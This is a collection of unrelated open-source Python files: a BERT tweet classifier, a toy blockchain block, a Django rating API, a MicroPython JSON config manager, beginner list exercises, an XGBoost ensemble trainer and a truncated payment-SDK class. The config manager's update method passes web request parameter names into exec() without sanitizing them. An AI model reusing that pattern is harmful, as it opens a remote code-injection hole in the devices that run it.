train_loss_total.append(train_loss/i)\r\n print('BERT: [%d] train loss: %.5f' %\r\n (epoch + 1, train_loss/i))\r\n train_loss = 0\r\n\r\n #test on validation set\r\n val_loss = 0\r\n val_accuracy = 0\r\n val_correct = 0\r\n val_total = 0\r\n model.eval()\r\n for i, data in enumerate(val_set_loader):\r\n input_id = data[0].to(device)\r\n attention_mask = data[1].to(device)\r\n target = data[2].to(device)\r\n with torch.no_grad():\r\n loss, logits = model(input_id,token_type_ids=None, attention_mask=attention_mask, labels=target)\r\n val_loss += loss.item()\r\n logits = logits.detach().cpu().numpy()\r\n label = target.to('cpu').numpy()\r\n pred_flat = np.argmax(logits, axis=1).flatten()\r\n label_flat = label.flatten()\r\n val_correct += np.sum(pred_flat == label_flat)\r\n val_total += len(label_flat)\r\n\r\n val_loss_total.append(val_loss/i)\r\n print('BERT: [%d] val loss: %.5f' %\r\n (epoch + 1, val_loss/i))\r\n val_loss = 0\r\n\r\n val_accuracy = val_correct/val_total\r\n val_acc_total.append(val_accuracy)\r\n print(\"validation accuracy is \", val_accuracy)\r\n\r\n#Form a table\r\nTable_BERT = PrettyTable()\r\nTable_BERT_title = (np.arange(epochs) + 1).tolist()\r\nTable_BERT_title.insert(0,'number of epochs')\r\nTable_BERT.field_names = Table_BERT_title\r\n\r\nTable_BERT_train = train_loss_total.copy()\r\nTable_BERT_train.insert(0,\"train_loss_total\")\r\nTable_BERT.add_row(Table_BERT_train)\r\n\r\nTable_BERT_val = val_loss_total.copy()\r\nTable_BERT_val.insert(0,\"val_loss_total\")\r\nTable_BERT.add_row(Table_BERT_val)\r\n\r\nTable_BERT_acc = val_acc_total.copy()\r\nTable_BERT_acc.insert(0,\"val_acc_total\")\r\nTable_BERT.add_row(Table_BERT_acc)\r\nprint(Table_BERT)\r\n\r\nprint()\r\n\r\n#train on all data\r\nmodel = BertForSequenceClassification.from_pretrained(\r\n \"bert-base-uncased\",\r\n num_labels=2)\r\nmodel.cuda()\r\noptimizer = AdamW(model.parameters(), lr=5e-6, eps=1e-8)\r\n\r\ntrain_all_loader = torch.utils.data.DataLoader(dataset, batch_size=batchsize, shuffle=True)\r\n\r\ntrain_loss_total = []\r\nfor epoch in range(epochs):\r\n train_loss = 0\r\n model.train()\r\n #train on training set\r\n for i, data in enumerate(train_all_loader):\r\n input_id = data[0].to(device)\r\n attention_mask = data[1].to(device)\r\n target = data[2].to(device)\r\n model.zero_grad()\r\n loss, logits = model(input_id, token_type_ids=None, attention_mask=attention_mask, labels=target)\r\n train_loss += loss.item()\r\n loss.backward()\r\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\r\n optimizer.step()\r\n\r\n train_loss_total.append(train_loss/i)\r\n print('BERT: [%d] train loss: %.5f' %\r\n (epoch + 1, train_loss/i))\r\n train_loss = 0\r\n\r\n#predict test\r\ntest_pred = []\r\nprediction = []\r\nmodel.eval()\r\nfor _, data in enumerate(test_set_loader):\r\n input_id = data[0].to(device)\r\n attention_mask = data[1].to(device)\r\n with torch.no_grad():\r\n output = model(input_id, token_type_ids=None, attention_mask=attention_mask)\r\n logits = output[0]\r\n logits = logits.detach().cpu().numpy()\r\n test_pred = np.argmax(logits, axis=1).flatten()\r\n prediction = np.concatenate((prediction, test_pred))\r\nprediction = prediction.astype(np.int64)\r\n#Write my prediction into CSV file\r\nlen_test = len(test_df)\r\nindex_test = []\r\nfor i in range(len_test):\r\n index_test.append(test_df['id'][i])\r\n\r\nwith open(\"labels.csv\", 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n writer.writerow(['id', 'target'])\r\n for i in range(len_test):\r\n writer.writerow([index_test[i], prediction[i]])\r\n\r\nprint()\r\n","repo_name":"Yi-fei-X/kaggle_NLP_disaster_tweets","sub_path":"Bert.py","file_name":"Bert.py","file_ext":"py","file_size_in_byte":9271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"832171640","text":"from .utils import sha3_256, simple_encode\n\nclass Block():\n def __init__(self, header=None, transactions=None):\n if not header:\n raise ValueError(\"Argument 'header' is not provided.\")\n self.header = header\n self.transactions = transactions or []\n\n # Flag to indicate if the block is a candidate\n self._is_candidate = False\n\n def from_prevstate(self, state=None, timestamp=None):\n if not state:\n raise ValueError(\"Argument 'state' is not provided.\")\n\n prev_header = state.prev_headers[0]\n next_header = {\n \"number\": prev_header.number + 1,\n \"timestamp\": timestamp or prev_header.timestamp + 1,\n \"prevhash\": prev_header.hash,\n \"difficulty\": prev_header.difficulty,\n \"nonce\": \"\"\n }\n\n self.header.number = next_header[\"number\"]\n self.header.timestamp = next_header[\"timestamp\"]\n self.header.prevhash = next_header[\"prevhash\"]\n self.header.difficulty = next_header[\"difficulty\"]\n self.header.nonce = next_header[\"nonce\"]\n\n return self\n\n def make_roots(self, state):\n self.header.state_root = state.root_hash\n self.header.tx_root = sha3_256(simple_encode([dict(tx) for tx in self.transactions]))\n\n # Mark the block as a candidate\n self._is_candidate = True\n\n @property\n def is_candidate(self):\n return self._is_candidate\n\n def mine(self, start_nonce=0, max_nonce=2**64):\n \"\"\"\n Simple proof-of-work algorithm\n \"\"\"\n\n # Check if the block is a candidate\n assert self.is_candidate, \"Block should be a candidate in order to perform pow mining.\"\n\n # calculate the difficulty target\n target = (2**256 // self.header.difficulty) - 1\n block_hash = self.header.hash\n\n for nonce in range(max_nonce):\n hash_result = sha3_256(block_hash + bytes(nonce))\n\n # check if this is a valid result, below the target\n num = int.from_bytes(hash_result, byteorder=\"big\")\n if num < target:\n self.header.nonce = nonce\n return nonce\n\n return None\n\n def validate(self):\n return True\n\n def verify(self):\n return True\n\n def __iter__(self):\n return iter([\n (\"header\", dict(self.header)),\n (\"transactions\", [dict(tx) for tx in self.transactions])\n ])\n","repo_name":"ccniuj/simblock","sub_path":"simblock/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"51"} +{"seq_id":"12111258211","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom drf_spectacular.utils import extend_schema\nfrom drf_spectacular.utils import extend_schema_view\nfrom rest_framework import mixins\nfrom rest_framework import status\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom api.serializers.rating.api import CreateRatingSerializer\nfrom api.serializers.rating.api import UpdateRatingSerializer\nfrom movies.models import Raiting\n\n\n@extend_schema_view(\n change_rating=extend_schema(summary=\"Change rating of film\", tags=[\"Rating\"])\n)\nclass RatingView(mixins.CreateModelMixin, viewsets.GenericViewSet):\n permission_classes = (IsAuthenticated,)\n queryset = Raiting.objects.all()\n\n serializer_action_classes = {\n \"create\": CreateRatingSerializer,\n \"change_rating\": UpdateRatingSerializer,\n }\n\n def get_serializer_context(self):\n return {\n \"request\": self.request,\n }\n\n def get_serializer_class(self):\n \"\"\"Return the serializer class based on the request method\"\"\"\n try:\n return self.serializer_action_classes[self.action]\n except (KeyError, AttributeError):\n return super().get_serializer_class()\n\n def create(self, request, *args, **kwargs):\n movie = request.data.get(\"movie\")\n if Raiting.objects.filter(user=request.user, movie=movie).exists():\n return Response(\n {\"detail\": \"Rating already exists for this movie.\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n serializer = CreateRatingSerializer(\n data=request.data, context={\"request\": request}\n )\n if serializer.is_valid():\n serializer.save()\n return Response(\n {\"detail\": \"Rating saved successfully.\"},\n status=status.HTTP_201_CREATED,\n )\n else:\n return Response(\n {\"detail\": \"Invalid rating data.\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n @action(methods=[\"patch\"], detail=False, url_path=\"change_rating\")\n def change_rating(self, request):\n user = request.user\n movie = request.data.get(\"movie\")\n rating_value = request.data.get(\"rating\") # noqa: F841\n\n try:\n rating = Raiting.objects.get(user=user, movie=movie)\n serializer = self.get_serializer(rating, data=request.data, partial=True)\n if serializer.is_valid():\n rating = serializer.change_rating(rating, serializer.validated_data)\n return Response({\"message\": \"Rating updated successfully\"})\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n except ObjectDoesNotExist:\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid():\n rating = serializer.save()\n return Response(\n {\"message\": \"Rating created successfully\"},\n status=status.HTTP_201_CREATED,\n )\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"DmitriBe1ov/Graduation_project","sub_path":"MovieSearcher/api/views/rating_view.py","file_name":"rating_view.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43361927016","text":"import json\nimport re\nimport uos\nfrom tools import useful\n\nself_config = None\nclass JsonConfig:\n\t\"\"\" Manage json configuration \"\"\"\n\tdef __init__(self):\n\t\t\"\"\" Constructor \"\"\"\n\t\tself.modification_date = 0\n\n\tdef config_root(self):\n\t\t\"\"\" Configuration root path \"\"\"\n\t\tif useful.ismicropython():\n\t\t\treturn \"/config\"\n\t\telse:\n\t\t\treturn \"config\"\n\n\tdef save(self, file = None, part_filename=\"\"):\n\t\t\"\"\" Save object in json file \"\"\"\n\t\ttry:\n\t\t\tfilename = self.get_pathname(useful.tofilename(part_filename))\n\t\t\tfile, filename = self.open(file=file, read_write=\"w\", part_filename=part_filename)\n\t\t\tdata = self.__dict__.copy()\n\t\t\tdel data[\"modification_date\"]\n\t\t\tjson.dump(useful.tostrings(data),file)\n\t\t\tfile.close()\n\t\t\tself.modification_date = uos.stat(filename)[8]\n\t\t\treturn True\n\t\texcept Exception as err:\n\t\t\tuseful.syslog(err, \"Cannot save %s \"%(filename))\n\t\t\treturn False\n\n\tdef to_string(self):\n\t\t\"\"\" Convert the configuration to string \"\"\"\n\t\tdata = self.__dict__.copy()\n\t\tdel data[\"modification_date\"]\n\t\treturn json.dumps(useful.tostrings(data))\n\n\tdef get_pathname(self, part_filename=\"\"):\n\t\t\"\"\" Get the configuration filename according to the class name \"\"\"\n\t\treturn self.config_root()+\"/\"+self.get_filename(part_filename) + \".json\"\n\n\tdef list_all(self):\n\t\t\"\"\" List all configuration files \"\"\"\n\t\tresult = []\n\t\tpattern = self.get_filename() + \".*\"\n\t\tfor fileinfo in uos.ilistdir(self.config_root()):\n\t\t\tname = fileinfo[0]\n\t\t\ttyp = fileinfo[1]\n\t\t\tif typ & 0xF000 != 0x4000:\n\t\t\t\tif re.match(pattern, name):\n\t\t\t\t\tresult.append(useful.tobytes(name[len(self.get_filename()):-len(\".json\")]))\n\t\treturn result\n\n\tdef get_filename(self, part_filename=\"\"):\n\t\t\"\"\" Return the config filename \"\"\"\n\t\tif self.__class__.__name__[-len(\"Config\"):] == \"Config\":\n\t\t\tname = self.__class__.__name__[:-len(\"Config\")]\n\t\telse:\n\t\t\tname = self.__class__.__name__\n\t\treturn name + useful.tostrings(part_filename)\n\n\tdef open(self, file=None, read_write=\"r\", part_filename=\"\"):\n\t\t\"\"\" Create or open configuration file \"\"\"\n\t\tfilename = file\n\t\tif useful.exists(self.config_root()) is False:\n\t\t\tuseful.makedir(self.config_root())\n\t\tif file is None:\n\t\t\tfilename = self.get_pathname(useful.tofilename(part_filename))\n\t\t\tfile = open(filename, read_write)\n\t\telif type(file) == type(\"\"):\n\t\t\tfile = open(filename, read_write)\n\t\treturn file, filename\n\n\tdef update(self, params):\n\t\t\"\"\" Update object with html request params \"\"\"\n\t\tglobal self_config\n\t\tif b\"name\" in params and b\"value\" in params and len(params) == 2:\n\t\t\tsetmany = False\n\t\t\tparams = {params[b\"name\"]:params[b\"value\"]}\n\t\telse:\n\t\t\tsetmany = True\n\t\tself_config = self\n\t\tfor name in self.__dict__.keys():\n\t\t\t# Case of web input is missing when bool is false\n\t\t\tif type(self.__dict__[name]) == type(True):\n\t\t\t\tname = useful.tobytes(name)\n\t\t\t\tif name in params:\n\t\t\t\t\tif type(params[name]) == type(\"\"):\n\t\t\t\t\t\tif params[name] == \"\":\n\t\t\t\t\t\t\tparams[name] = True\n\t\t\t\t\t\telif params[name] == \"1\" or params[name].lower() == \"true\":\n\t\t\t\t\t\t\tparams[name] = True\n\t\t\t\t\t\telif params[name] == \"0\" or params[name].lower() == \"false\":\n\t\t\t\t\t\t\tparams[name] = False\n\t\t\t\t\telif type(params[name]) == type(b\"\"):\n\t\t\t\t\t\tif params[name] == b\"\":\n\t\t\t\t\t\t\tparams[name] = True\n\t\t\t\t\t\telif params[name] == b\"1\" or params[name].lower() == b\"true\":\n\t\t\t\t\t\t\tparams[name] = True\n\t\t\t\t\t\telif params[name] == b\"0\" or params[name].lower() == b\"false\":\n\t\t\t\t\t\t\tparams[name] = False\n\t\t\t\telse:\n\t\t\t\t\tif setmany:\n\t\t\t\t\t\tparams[name] = False\n\t\t\t# Case of web input is integer but string with number received\n\t\t\telif type(self.__dict__[name]) == type(0) or type(self.__dict__[name]) == type(0.):\n\t\t\t\tname = useful.tobytes(name)\n\t\t\t\tif name in params:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tparams[name] = int(params[name])\n\t\t\t\t\texcept:\n\t\t\t\t\t\tparams[name] = 0\n\t\tresult = True\n\t\tfor name, value in params.items():\n\t\t\texecval = useful.tostrings(name)\n\t\t\ttry:\n\t\t\t\ttry:\n\t\t\t\t\t# pylint: disable=exec-used\n\t\t\t\t\texec(\"a = self_config.%s\"%execval)\n\t\t\t\t\texisting = True\n\t\t\t\texcept:\n\t\t\t\t\texisting = False\n\n\t\t\t\tif existing:\n\t\t\t\t\texecval = \"self_config.%s = %s\"%(execval, repr(value))\n\t\t\t\t\t# pylint: disable=exec-used\n\t\t\t\t\texec(execval)\n\t\t\t\telse:\n\t\t\t\t\tif name != b\"action\":\n\t\t\t\t\t\tprint(\"%s.%s not existing\"%(self.__class__.__name__, useful.tostrings(name)))\n\t\t\texcept Exception as err:\n\t\t\t\tuseful.syslog(err, \"Error on %s\"%(execval))\n\t\t\t\tresult = False\n\t\tdel self_config\n\t\treturn result\n\n\tdef load(self, file = None, part_filename=\"\"):\n\t\t\"\"\" Load object with the file specified \"\"\"\n\t\ttry:\n\t\t\tfilename = self.get_pathname(useful.tofilename(part_filename))\n\t\t\tfile, filename = self.open(file=file, read_write=\"r\", part_filename=part_filename)\n\t\t\tself.update(useful.tobytes(json.load(file)))\n\t\t\tfile.close()\n\t\t\treturn True\n\t\texcept OSError as err:\n\t\t\tif err.args[0] == 2:\n\t\t\t\tuseful.syslog(\"Not existing %s \"%(filename))\n\t\t\telse:\n\t\t\t\tuseful.syslog(err, \"Cannot load %s \"%(filename))\n\t\t\treturn False\n\t\texcept Exception as err:\n\t\t\tuseful.syslog(err, \"Cannot load %s \"%(filename))\n\t\t\treturn False\n\n\tdef forget(self, part_filename=\"\"):\n\t\t\"\"\" Forget configuration \"\"\"\n\t\tfilename = self.get_pathname(part_filename=part_filename)\n\t\tuseful.remove(self.config_root()+\"/\"+filename)\n\n\tdef is_changed(self, part_filename=\"\"):\n\t\t\"\"\" Indicates if the configuration changed \"\"\"\n\t\ttry:\n\t\t\tmodification_date = uos.stat(self.get_pathname(useful.tofilename(part_filename)))[8]\n\t\t\tif self.modification_date != modification_date:\n\t\t\t\tself.modification_date = modification_date\n\t\t\t\treturn True\n\t\texcept:\n\t\t\tpass\n\t\treturn False\n","repo_name":"yansinan/py-pycameresp","sub_path":"lib/tools/jsonconfig.py","file_name":"jsonconfig.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"37947137171","text":"numbers = [1, 2, 5]\nprint(5 in numbers)\nprint(5 not in numbers)\n\ncities = [\"Kiev\", \"London\", \"Los Angeles\"]\n\nfor city in cities:\n print(city)\n\nnumbers = [42, 77, 16, 101, 23, 8, 4, 15, 55]\nnumbers.sort()\n\nfor number in numbers:\n if number > 42:\n break\n print(number)\n\nimport random\nnumbers = []\n\nwhile len(numbers) < 5:\n numbers.append(random.randint(1, 100))\n\nfor number in numbers:\n print(number)\n if number >= 90:\n print('Found at least one number greater than 90')\n break\nelse:\n print('No numbers greater than 90')\n\nprint('Complete')\n\nsuits = [\"Hearts\", \"Spades\", \"Clubs\", \"Diamonds\"]\nranks = [\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"Jack\", \"Queen\", \"King\", \"Ace\"]\n\nfor suit in suits:\n for rank in ranks:\n print(f'{rank} of {suit}') \n\n numbers = [42, 77, 16, 101, 23, 8, 4, 15, 55]\nselected_number = random.choice(numbers)\nprint(selected_number)\n\nselected_numbers = random.choices(numbers, k=3)\nprint(selected_numbers)\n\nimport random\n\nsuits = [\"Hearts\", \"Spades\", \"Clubs\", \"Diamonds\"]\nranks = [\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"Jack\", \"Queen\", \"King\", \"Ace\"]\ndeck = []\n\nfor suit in suits:\n for rank in ranks:\n deck.append(f'{rank} of {suit}')\n\nprint(f'There are {len(deck)} cards in the deck.')\n\nprint('Dealing ...')\n\nhand = []\n\nwhile len(hand) < 5:\n card = random.choice(deck)\n deck.remove(card)\n hand.append(card)\n\nprint(f'There are {len(deck)} cards in the deck.')\nprint('Player has the following cards in their hand:')\nprint(hand)","repo_name":"ZiubinA/-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"8922916879","text":"# coding: utf-8\r\n__author__ = 'ZFTurbo: https://www.drivendata.org/users/ZFTurbo/'\r\n\r\n\r\nfrom operator import itemgetter\r\nfrom gbm_classifiers.a01_read_data import *\r\n\r\n\r\ndef create_feature_map(features):\r\n outfile = open('xgb.fmap', 'w')\r\n for i, feat in enumerate(features):\r\n outfile.write('{0}\\t{1}\\tq\\n'.format(i, feat))\r\n outfile.close()\r\n\r\n\r\ndef get_importance(gbm, features):\r\n create_feature_map(features)\r\n '''\r\n ‘weight’ - the number of times a feature is used to split the data across all trees.\r\n ‘gain’ - the average gain of the feature when it is used in trees\r\n ‘cover’ - the average coverage of the feature when it is used in trees\r\n '''\r\n importance = gbm.get_score(fmap='xgb.fmap', importance_type='weight')\r\n importance = sorted(importance.items(), key=itemgetter(1), reverse=True)\r\n return importance\r\n\r\n\r\ndef get_kfold_split(folds_number, len_train, target, random_state):\r\n train_index = list(range(len_train))\r\n folds = StratifiedKFold(n_splits=folds_number, shuffle=True, random_state=random_state)\r\n ret = []\r\n for n_fold, (trn_idx, val_idx) in enumerate(folds.split(train_index, target)):\r\n ret.append([trn_idx, val_idx])\r\n return ret\r\n\r\n\r\ndef create_xgboost_model(train, features, params):\r\n import xgboost as xgb\r\n import matplotlib.pyplot as plt\r\n print('XGBoost version: {}'.format(xgb.__version__))\r\n target_name = params['target']\r\n start_time = time.time()\r\n\r\n unique_target = np.array(sorted(train[target_name].unique()))\r\n print('Target length: {}: {}'.format(len(unique_target), unique_target))\r\n\r\n required_iterations = 13\r\n overall_train_predictions = np.zeros((len(train), len(unique_target)), dtype=np.float32)\r\n overall_importance = dict()\r\n\r\n model_list = []\r\n for iter1 in range(required_iterations):\r\n num_folds = 5\r\n max_depth = random.choice([3, 4, 5])\r\n eta = random.choice([0.08, 0.1, 0.2])\r\n\r\n subsample = random.choice([0.7, 0.8, 0.9, 0.95])\r\n colsample_bytree = random.choice([0.7, 0.8, 0.9, 0.95])\r\n eval_metric = random.choice(['mlogloss'])\r\n # eval_metric = random.choice(['logloss'])\r\n ret = get_kfold_split(num_folds, len(train), train[target_name].values, 720 + iter1)\r\n\r\n log_str = 'XGBoost iter {}. FOLDS: {} METRIC: {} ETA: {}, MAX_DEPTH: {}, SUBSAMPLE: {}, COLSAMPLE_BY_TREE: {}'.format(0,\r\n num_folds,\r\n eval_metric,\r\n eta,\r\n max_depth,\r\n subsample,\r\n colsample_bytree)\r\n print(log_str)\r\n params_xgb = {\r\n \"objective\": \"multi:softprob\",\r\n \"num_class\": 5,\r\n \"booster\": \"gbtree\",\r\n \"eval_metric\": eval_metric,\r\n \"eta\": eta,\r\n \"max_depth\": max_depth,\r\n \"subsample\": subsample,\r\n \"colsample_bytree\": colsample_bytree,\r\n \"silent\": 1,\r\n \"seed\": 2017 + iter1,\r\n \"nthread\": 6,\r\n \"gamma\": 0,\r\n \"tree_method\": 'exact',\r\n # 'gpu_id': 0,\r\n # \"tree_method\": 'gpu_hist',\r\n # 'updater': 'grow_gpu',\r\n }\r\n num_boost_round = 10000\r\n early_stopping_rounds = 50\r\n\r\n # print('Train shape:', train.shape)\r\n # print('Features:', features)\r\n\r\n full_single_preds = np.zeros((len(train), len(unique_target)), dtype=np.float32)\r\n fold_num = 0\r\n for train_index, valid_index in ret:\r\n fold_num += 1\r\n print('Start fold {}'.format(fold_num))\r\n X_train = train.loc[train_index].copy()\r\n X_valid = train.loc[valid_index].copy()\r\n y_train = X_train[target_name]\r\n y_valid = X_valid[target_name]\r\n\r\n print('Train data:', X_train.shape)\r\n print('Valid data:', X_valid.shape)\r\n\r\n # Exclude unverified from validation\r\n if 1:\r\n bad_ids = train[train['verified'] == False]['id'].values\r\n # condition = ~np.isin(train_ids, bad_ids)\r\n # train_ids = train_ids[condition]\r\n # train_answ = train_answ[condition]\r\n condition = ~np.isin(X_valid['id'], bad_ids)\r\n X_valid_excluded = X_valid[condition]\r\n y_valid_excluded = y_valid[condition]\r\n print('Exclude bad IDs from validation...')\r\n print('Valid data:', X_valid_excluded.shape)\r\n\r\n dtrain = xgb.DMatrix(X_train[features].values, y_train)\r\n dvalid = xgb.DMatrix(X_valid_excluded[features].values, y_valid_excluded)\r\n\r\n watchlist = [(dtrain, 'train'), (dvalid, 'eval')]\r\n gbm = xgb.train(params_xgb, dtrain, num_boost_round, evals=watchlist,\r\n early_stopping_rounds=early_stopping_rounds, verbose_eval=5)\r\n model_list.append(gbm)\r\n\r\n imp = get_importance(gbm, features)\r\n print('Importance: {}'.format(imp[:100]))\r\n for i in imp:\r\n if i[0] in overall_importance:\r\n overall_importance[i[0]] += i[1] / num_folds\r\n else:\r\n overall_importance[i[0]] = i[1] / num_folds\r\n\r\n print('Best iter: {}'.format(gbm.best_iteration + 1))\r\n pred = gbm.predict(xgb.DMatrix(X_valid[features].values), ntree_limit=gbm.best_iteration + 1)\r\n full_single_preds[valid_index] += pred.copy()\r\n\r\n pred = gbm.predict(dvalid, ntree_limit=gbm.best_iteration + 1)\r\n try:\r\n score = params['metric_function'](y_valid_excluded, pred)\r\n print('Fold {} score: {:.6f}'.format(fold_num, score))\r\n except Exception as e:\r\n print('Error:', e)\r\n\r\n print(train[target_name].values)\r\n print(full_single_preds)\r\n\r\n # Exclude unverified from validation\r\n if 1:\r\n bad_ids = train[train['verified'] == False]['id'].values\r\n # condition = ~np.isin(train_ids, bad_ids)\r\n # train_ids = train_ids[condition]\r\n # train_answ = train_answ[condition]\r\n condition = ~np.isin(train['id'], bad_ids)\r\n full_single_preds_excluded = full_single_preds[condition]\r\n target_excluded = train[condition][target_name].values\r\n print('Exclude bad IDs from validation...')\r\n print('Valid data:', X_valid_excluded.shape)\r\n\r\n score = params['metric_function'](target_excluded, full_single_preds_excluded)\r\n overall_train_predictions += full_single_preds\r\n print('Score iter {}: {:.6f} Time: {:.2f} sec'.format(iter1, score, time.time() - start_time))\r\n\r\n overall_train_predictions /= required_iterations\r\n for el in overall_importance:\r\n overall_importance[el] /= required_iterations\r\n imp = sort_dict_by_values(overall_importance)\r\n names = []\r\n values = []\r\n print('Total importance count: {}'.format(len(imp)))\r\n output_features = 100\r\n for i in range(min(output_features, len(imp))):\r\n print('{}: {:.6f}'.format(imp[i][0], imp[i][1]))\r\n names.append(imp[i][0])\r\n values.append(imp[i][1])\r\n\r\n if 0:\r\n fig, ax = plt.subplots(figsize=(10, 25))\r\n ax.barh(list(range(min(output_features, len(imp)))), values, 0.4, color='green', align='center')\r\n ax.set_yticks(list(range(min(output_features, len(imp)))))\r\n ax.set_yticklabels(names)\r\n ax.invert_yaxis()\r\n plt.subplots_adjust(left=0.47)\r\n plt.savefig('debug.png')\r\n\r\n # Exclude unverified from validation\r\n if 1:\r\n bad_ids = train[train['verified'] == False]['id'].values\r\n # condition = ~np.isin(train_ids, bad_ids)\r\n # train_ids = train_ids[condition]\r\n # train_answ = train_answ[condition]\r\n condition = ~np.isin(train['id'], bad_ids)\r\n overall_train_predictions_excluded = overall_train_predictions[condition]\r\n target_excluded = train[condition][target_name].values\r\n print('Exclude bad IDs from validation...')\r\n print('Valid data:', X_valid_excluded.shape)\r\n\r\n score = params['metric_function'](target_excluded, overall_train_predictions_excluded)\r\n print('Total score: {:.6f}'.format(score))\r\n\r\n return overall_train_predictions, score, model_list, imp\r\n\r\n\r\ndef predict_with_xgboost_model(test, features, model_list):\r\n import xgboost as xgb\r\n\r\n dtest = xgb.DMatrix(test[features].values)\r\n full_preds = []\r\n for m in model_list:\r\n preds = m.predict(dtest, ntree_limit=m.best_iteration + 1)\r\n full_preds.append(preds)\r\n preds = np.array(full_preds).mean(axis=0)\r\n return preds\r\n\r\n\r\nif __name__ == '__main__':\r\n start_time = time.time()\r\n gbm_type = 'XGB'\r\n params = get_params()\r\n target = params['target']\r\n id = params['id']\r\n metric = params['metric']\r\n\r\n train, test, features = read_input_data()\r\n print('Features: [{}] {}'.format(len(features), features))\r\n\r\n if 1:\r\n overall_train_predictions, score, model_list, importance = create_xgboost_model(train, features, params)\r\n prefix = '{}_{}_{}_{:.6f}'.format(gbm_type, len(model_list), metric, score)\r\n save_in_file((score, model_list, importance, overall_train_predictions), MODELS_PATH + prefix + '.pklz')\r\n else:\r\n prefix = 'XGB_5_auc_0.891512'\r\n score, model_list, importance, overall_train_predictions = load_from_file(MODELS_PATH + prefix + '.pklz')\r\n\r\n for i, c in enumerate(CLASSES):\r\n train[c] = overall_train_predictions[:, i]\r\n train[[id] + CLASSES].to_csv(SUBM_PATH + prefix + '_train.csv', index=False, float_format='%.8f')\r\n\r\n overall_test_predictions = predict_with_xgboost_model(test, features, model_list)\r\n\r\n # SAVE OOF FEATURES\r\n save_in_file(overall_train_predictions, FEATURES_PATH + 'oof/' + prefix + '_train.pklz')\r\n save_in_file(overall_test_predictions, FEATURES_PATH + 'oof/' + prefix + '_test.pklz')\r\n\r\n # CREATE SUBM\r\n for i, c in enumerate(CLASSES):\r\n test[c] = overall_test_predictions[:, i]\r\n sample = pd.read_csv(INPUT_PATH + 'submission_format.csv')\r\n test = pd.merge(sample[['id']], test, on='id', how='left')\r\n out_path = SUBM_PATH + prefix + '_ensemble_{}.csv'.format(len(features))\r\n out_path_1 = SUBM_PATH + 'xgboost_ensemble.csv'\r\n test[[id] + CLASSES].to_csv(out_path, index=False, float_format='%.8f')\r\n test[[id] + CLASSES].to_csv(out_path_1, index=False, float_format='%.8f')\r\n print(\"Elapsed time overall: %s seconds\" % (time.time() - start_time))\r\n\r\n\r\n'''\r\nDensenet121 (0.430336) + IRV2 (0.450813) + IRV2 (0.444538):\r\nScore iter 0: 0.399968 Time: 88.66 sec\r\nScore iter 2: 0.400587 Time: 316.98 sec\r\nTotal score: 0.394132 LB: 0.3700\r\n\r\nDensenet121 (0.430336) + IRV2 (0.450813) + IRV2 (0.444538) + EfficientNetB4 (0.431532):\r\nTotal score: 0.386864\r\n\r\nDensenet121 (0.430336) + IRV2 (0.450813) + IRV2 (0.444538) + EfficientNetB4 (0.431532) + DenseNet169 + New neighbours:\r\nTotal score: 0.373275\r\n\r\nPseudolabels (overfit)\r\nTotal score: 0.268235\r\n\r\nScore iter 0: 0.379637 Time: 70.15 sec - GPU\r\nTotal score: 0.370199 LB: 0.3639\r\n\r\nTotal score: 0.374172\r\n\r\nTotal score: 0.373778\r\n'''","repo_name":"drivendataorg/open-ai-caribbean","sub_path":"2nd Place/gbm_classifiers/r16_run_xgboost.py","file_name":"r16_run_xgboost.py","file_ext":"py","file_size_in_byte":11843,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"51"} +{"seq_id":"28885595225","text":"import json\nfrom zotapaysdk.helpers import HTTP_STATUS_OK\nfrom zotapaysdk.mg_requests.response import MGResponse\n\n\nclass MGOrderStatusResponse(MGResponse):\n class Fields:\n TYPE = \"type\"\n STATUS = \"status\"\n ERROR_MESSAGE = \"errorMessage\"\n PROCESSOR_TRANSACTION_ID = \"processorTransactionID\"\n ORDER_ID = \"orderID\"\n MERCHANT_ORDER_ID = \"merchantOrderID\"\n AMOUNT = \"amount\"\n CURRENCY = \"currency\"\n CUSTOMER_EMAIL = \"customerEmail\"\n CUSTOM_PARAM = \"customParam\"\n REQUEST = \"request\"\n MESSAGE = \"message\"\n DATA = \"data\"\n\n def __init__(self, http_response):\n \"\"\"\n Wrapper around the order status request response from the API.\n\n Args:\n http_response (requests.Response):\n \"\"\"\n super().__init__(http_response)\n\n self._type = None\n self._status = None\n self._error_message = None\n self._processor_transaction_id = None\n self._order_id = None\n self._merchant_order_id = None\n self._amount = None\n self._currency = None\n self._customer_email = None\n self._custom_param = None\n self._request = None\n\n parsed_response = json.loads(http_response.text)\n\n if http_response.status_code != HTTP_STATUS_OK:\n self._error_message = parsed_response.get(self.Fields.MESSAGE, \"Unavailable message\")\n else:\n parsed_response_data = parsed_response.get(self.Fields.DATA, None)\n self._type = parsed_response_data.get(self.Fields.TYPE, None)\n self._status = parsed_response_data.get(self.Fields.STATUS, None)\n self._processor_transaction_id = parsed_response_data.get(\n self.Fields.PROCESSOR_TRANSACTION_ID, None)\n self._order_id = 